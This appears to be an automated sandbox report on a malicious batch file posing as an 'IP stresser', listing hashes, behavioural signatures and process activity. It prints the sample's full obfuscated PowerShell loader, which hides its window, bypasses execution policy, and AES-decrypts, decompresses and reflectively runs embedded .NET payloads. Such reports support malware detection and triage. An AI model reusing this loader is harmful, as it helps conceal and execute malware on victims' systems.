Analysis
- max time kernel: 120s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 28-04-2024 02:55
Static task: static1
Behavioral task: behavioral1
- Sample: IPstresser.bat
- Resource: win7-20240221-en
- 4 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: IPstresser.bat
- Resource: win10v2004-20240426-en
- 16 signatures
- 150 seconds
General
- Target: IPstresser.bat
- Size: 110KB
- MD5: 4cbfab042795f657884a406a51d4ec6f
- SHA1: c10c313cefe72a09d43dfe1372eb8f200a85860c
- SHA256: 2d6df8a9163bf7b8c59ab0e01b93b8793c94b6513c5af6f7c9c6da493f77ebfb
- SHA512: 8773649c55df56d1c7955aa93a9420daf2852f7bd37e6b32f9a1327db8d70dabad7d2179651bdfab9638dae15a45748eb426dd3a2d68184feafd393308a80622
- SSDEEP: 1536:3cD5OO6WnyqyAQkb7FhNLk56/uXMMAAhtXmVEMCB91Z+qiIwxN/DFzINczTpOL:O5OO6Wyqy3Q7C5wC86Mg91cruSdOL
Score: 7/10
Malware Config
Signatures
- Deletes itself (1 IoC)
  Processes: cmd.exe (pid 2076)
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (pid 2188)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (pid 2188), description: Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
  - PID 2076 (cmd.exe) wrote to memory of 2188 (powershell.exe)
  - PID 2076 (cmd.exe) wrote to memory of 2188 (powershell.exe)
  - PID 2076 (cmd.exe) wrote to memory of 2188 (powershell.exe)
Processes
- C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\IPstresser.bat"
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of cmd.exe)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('la9164c2CHXOtVjsEzb/di2tt2EmrBknsikvZzwy+lA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MG099+K63nybi6ytFcIO9w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UWDjB=New-Object System.IO.MemoryStream(,$param_var); $uPsDm=New-Object System.IO.MemoryStream; $EmRHJ=New-Object System.IO.Compression.GZipStream($UWDjB, [IO.Compression.CompressionMode]::Decompress); $EmRHJ.CopyTo($uPsDm); $EmRHJ.Dispose(); $UWDjB.Dispose(); $uPsDm.Dispose(); $uPsDm.ToArray();}function execute_function($param_var,$param2_var){ $bAAUH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xfGLt=$bAAUH.EntryPoint; $xfGLt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IPstresser.bat';$rfudV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IPstresser.bat').Split([Environment]::NewLine);foreach ($BHjqG in $rfudV) { if ($BHjqG.StartsWith(':: ')) { $uYxXT=$BHjqG.Substring(3); break; }}$payloads_var=[string[]]$uYxXT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads
- memory/2188-4-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp (Filesize: 9.6MB)
- memory/2188-5-0x00000000025B0000-0x0000000002630000-memory.dmp (Filesize: 512KB)
- memory/2188-6-0x000000001B2E0000-0x000000001B5C2000-memory.dmp (Filesize: 2.9MB)
- memory/2188-7-0x00000000025B0000-0x0000000002630000-memory.dmp (Filesize: 512KB)
- memory/2188-8-0x0000000002310000-0x0000000002318000-memory.dmp (Filesize: 32KB)
- memory/2188-9-0x00000000025B0000-0x0000000002630000-memory.dmp (Filesize: 512KB)
- memory/2188-10-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp (Filesize: 9.6MB)